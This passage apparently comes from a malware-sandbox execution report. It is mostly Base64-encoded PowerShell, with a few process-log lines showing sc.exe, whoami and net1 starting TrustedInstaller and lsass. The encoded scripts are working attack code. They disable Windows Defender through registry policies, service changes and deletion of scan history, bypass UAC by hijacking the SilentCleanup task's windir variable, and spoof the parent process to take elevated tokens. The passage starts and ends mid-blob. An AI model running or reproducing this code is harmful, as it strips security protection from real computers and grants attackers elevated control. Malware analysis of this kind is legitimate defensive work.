AE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8156 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8892
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:9024
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:5160
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9440
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:9644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAG